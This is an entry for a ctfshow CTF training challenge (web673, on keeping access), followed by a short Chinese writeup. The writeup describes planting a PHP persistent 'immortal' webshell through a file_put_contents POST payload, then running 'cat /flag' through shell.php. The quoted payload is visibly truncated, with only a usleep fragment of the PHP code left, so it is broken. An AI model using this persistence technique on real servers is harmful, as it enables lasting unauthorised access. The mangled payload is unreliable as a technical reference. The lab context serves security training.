web673
| ID: | 4264 |
|---|---|
| 标题: | web673 |
| 描述: | * 此题为 【从0开始学web】系列第六百七十三题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 |
| 类型: | WEB入门.权限维持 |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/1492 |
| 赛事: | 权限维持 |
| 年度: | None |
| Flag值: | 题目答案文本 |
| writeup: |
验证后的网址 使用PHP不死马技术维持权限,通过写入shell.php并触发check后执行命令获取flag。具体payload为: GET:?action=cmd POST:cmd=file_put_contents('17.php', '");usleep(5000);}?>') 访问17.php后触发check,再通过shell.php执行cat /flag获取flag 1 3 https://blog.csdn.net/Jayjay___/article/details/132387118 https://www.cnblogs.com/yuy0ung/articles/18568733 |